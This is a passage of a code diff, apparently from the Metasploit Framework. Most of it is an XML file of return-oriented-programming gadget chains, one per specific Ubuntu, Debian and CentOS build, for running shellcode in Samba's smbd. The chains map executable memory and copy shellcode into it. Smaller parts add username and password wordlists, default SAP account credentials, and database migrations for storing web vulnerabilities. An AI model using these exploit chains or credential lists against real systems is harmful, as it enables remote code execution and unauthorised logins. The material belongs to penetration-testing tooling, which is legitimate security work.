<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00084000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget offset="0x00008532">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x0006933f">pop eax ; ret</gadget>
|
||||
<gadget offset="0x00084100">eax = writable location, in GOT</gadget>
|
||||
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
|
||||
<gadget offset="0x00084100">ebx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk for ebx</gadget>
|
||||
<gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
|
||||
<gadget value ="0x00000000">junk for edi</gadget>
|
||||
<gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
|
||||
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x0006933f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00083024">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x00004803">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0001fdfa">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcr
|
||||
ii libgcrypt11 1.4.6-4ubuntu2 LGPL Crypto library - runtime library
|
||||
b69f8000-b6a69000 r-xp 00000000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
||||
b6a69000-b6a6a000 r**p 00070000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
||||
b6a6a000-b6a6c000 rw-p 00071000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
||||
|
||||
we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
|
||||
4 first pops are after pop esp
|
||||
-->
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072010">mmap@got - 4</gadget>
|
||||
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x00007f19">jmp eax</gadget>
|
||||
<gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005d903">xchg eax, edx ; ret || edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
|
||||
<gadget offset="0x0005c45c">pop ecx ; ret</gadget>
|
||||
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
|
||||
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
|
||||
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
|
||||
<gadget offset="0x0005cd54">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
||||
<gadget offset="0x0007204c">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x00060e5a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0005baca">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcrypt
|
||||
ii libgcrypt11 1.4.5-2ubuntu1 LGPL Crypto library - runtime library
|
||||
b6a20000-b6a91000 r-xp 00000000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
||||
b6a91000-b6a92000 r**p 00070000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
||||
b6a92000-b6a94000 rw-p 00071000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x00071ff4">offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072010">mmap@got - 4</gadget>
|
||||
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x0000922c">jmp eax</gadget>
|
||||
<gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
|
||||
<gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
|
||||
<gadget offset="0x0006421f">pop eax ; ret</gadget>
|
||||
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00043999">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072094">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x00043999">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<!-- set ecx to same value than edx -->
|
||||
<gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
|
||||
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
|
||||
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
|
||||
<gadget offset="0x0005cd74"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x0006ea7f"> xchg eax, esi ; ret ; || restore eax</gadget>
|
||||
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x000128cc">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>3.5.10-0.107.el5 on CentOS 5</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
yum list |grep libgcrypt
|
||||
libgcrypt.i386 1.4.4-5.el5 installed
|
||||
02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
|
||||
02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
|
||||
section is writable and executable, we'll copy the shellcode over there instead of using mmap
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
|
||||
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
|
||||
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
|
||||
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
|
||||
<gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
|
||||
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
|
||||
<gadget offset="0x0006a73f">pop eax ; ret</gadget>
|
||||
<gadget offset="0x0007effc">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
|
||||
<gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
|
||||
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
|
||||
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
|
||||
<gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
|
||||
<gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1**</gadget>
|
||||
<gadget offset="0x0006200a">pushad ; ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
</rop>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2
|
||||
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x0000f3b1">pop eax; ret</gadget>
|
||||
<gadget offset="0x00991ff0">mmap64@got</gadget>
|
||||
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
||||
<gadget offset="0x008c8997">jmp eax</gadget>
|
||||
<gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
||||
<gadget offset="0x0034fbd2">pop edx ; ret</gadget>
|
||||
<gadget offset="0x0099a000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x0034c2bc">mov dword [edx], eax ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for esi</gadget>
|
||||
<gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x001a73b2">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
|
||||
<gadget offset="0x0008c5ac">pop eax; ret</gadget>
|
||||
<gadget offset="0x00991904">memcpy@got</gadget>
|
||||
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x001726b5">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0002ab2c">pushad, ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x0000f445">pop eax; ret</gadget>
|
||||
<gadget offset="0x008c1008">mmap64@got</gadget>
|
||||
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
||||
<gadget offset="0x0009e8e4">jmp eax</gadget>
|
||||
<gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
||||
<gadget offset="0x001f6142">pop edx ; ret</gadget>
|
||||
<gadget offset="0x008c9000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
|
||||
<gadget offset="0x00277540">pop ebp ; ret</gadget>
|
||||
<gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
|
||||
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x0000f445">pop eax; ret</gadget>
|
||||
<gadget offset="0x008c0964">memcpy@got</gadget>
|
||||
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0000dbcf">pushad, ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
-->
|
||||
<!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6
|
||||
<compatibility
|
||||
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
|
||||
</compatibility>
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00021cd9">pop eax; ret</gadget>
|
||||
<gadget offset="0x008cf86c">mmap64@got</gadget>
|
||||
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
||||
<gadget offset="0x000234e5">jmp eax</gadget>
|
||||
<gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
||||
<gadget offset="0x0001cf12">pop edx ; ret</gadget>
|
||||
<gadget offset="0x008d6000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x00394107">pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x0017892d">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
|
||||
<gadget offset="0x00021cd9">pop eax; ret</gadget>
|
||||
<gadget offset="0x008cf1e8">memcpy@got</gadget>
|
||||
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0001f666">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x00020453">pushad, ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
-->
|
||||
</db>
|
|
@ -4,37 +4,42 @@ class ConvertBinary < ActiveRecord::Migration
|
|||
class WebPage < ActiveRecord::Base
|
||||
serialize :headers
|
||||
end
|
||||
|
||||
|
||||
class WebVuln < ActiveRecord::Base
|
||||
serialize :params
|
||||
end
|
||||
|
||||
|
||||
def bfilter(str)
|
||||
str = str.to_s
|
||||
str.encoding = 'binary' if str.respond_to?('encoding=')
|
||||
str.gsub(/[\x00\x7f-\xff]/, '')
|
||||
end
|
||||
|
||||
|
||||
def self.up
|
||||
rename_column :web_pages, :body, :body_text
|
||||
rename_column :web_pages, :request, :request_text
|
||||
rename_column :web_vulns, :request, :request_text
|
||||
rename_column :web_vulns, :proof, :proof_text
|
||||
|
||||
|
||||
add_column :web_pages, :body, :binary
|
||||
add_column :web_pages, :request, :binary
|
||||
add_column :web_vulns, :request, :binary
|
||||
add_column :web_vulns, :request, :binary
|
||||
add_column :web_vulns, :proof, :binary
|
||||
|
||||
|
||||
WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
|
||||
WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
|
||||
WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
|
||||
WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
|
||||
|
||||
|
||||
remove_column :web_pages, :body_text
|
||||
remove_column :web_pages, :request_text
|
||||
remove_column :web_vulns, :request_text
|
||||
remove_column :web_vulns, :proof_text
|
||||
|
||||
WebPage.connection.schema_cache.clear!
|
||||
WebPage.reset_column_information
|
||||
WebVuln.connection.schema_cache.clear!
|
||||
WebVuln.reset_column_information
|
||||
end
|
||||
|
||||
def self.down
|
||||
|
@ -43,21 +48,25 @@ class ConvertBinary < ActiveRecord::Migration
|
|||
rename_column :web_pages, :request, :request_binary
|
||||
rename_column :web_vulns, :request, :request_binary
|
||||
rename_column :web_vulns, :proof, :proof_binary
|
||||
|
||||
|
||||
add_column :web_pages, :body, :text
|
||||
add_column :web_pages, :request, :text
|
||||
add_column :web_vulns, :request, :text
|
||||
add_column :web_vulns, :proof, :text
|
||||
|
||||
|
||||
WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
|
||||
WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
|
||||
WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
|
||||
WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
|
||||
|
||||
|
||||
remove_column :web_pages, :body_binary
|
||||
remove_column :web_pages, :request_binary
|
||||
remove_column :web_vulns, :request_binary
|
||||
remove_column :web_vulns, :proof_binary
|
||||
|
||||
|
||||
WebPage.connection.schema_cache.clear!
|
||||
WebPage.reset_column_information
|
||||
WebVuln.connection.schema_cache.clear!
|
||||
WebVuln.reset_column_information
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,13 @@
|
|||
class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration
|
||||
|
||||
def self.up
|
||||
add_column :web_vulns, :owner, :string
|
||||
add_column :web_vulns, :payload, :text
|
||||
end
|
||||
|
||||
def self.down
|
||||
remove_column :web_vulns, :owner
|
||||
remove_column :web_vulns, :payload
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,3 @@
|
|||
calvin
|
||||
123456
|
||||
password
|
|
@ -0,0 +1,3 @@
|
|||
root
|
||||
user1
|
||||
admin
|
|
@ -0,0 +1,14 @@
|
|||
SAP* 06071992
|
||||
SAP* PASS
|
||||
DDIC 19920706
|
||||
DDIC Welcome01
|
||||
SAPCPIC ADMIN
|
||||
EARLYWATCH SUPPORT
|
||||
TMSADM PASSWORD
|
||||
TMSADM ADMIN
|
||||
ADMIN welcome
|
||||
ADSUSER ch4ngeme
|
||||
ADS_AGENT ch4ngeme
|
||||
DEVELOPER ch4ngeme
|
||||
J2EE_ADMIN ch4ngeme
|
||||
SAPJSF ch4ngeme
|
|
@ -1,25 +1,19 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This sample auxiliary module simply displays the selected action and
|
||||
# registers a custom command that will show up when the module is used.
|
||||
#
|
||||
###
|
||||
class Auxiliary::Sample < Msf::Auxiliary
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
@ -50,5 +44,3 @@ class Auxiliary::Sample < Msf::Auxiliary
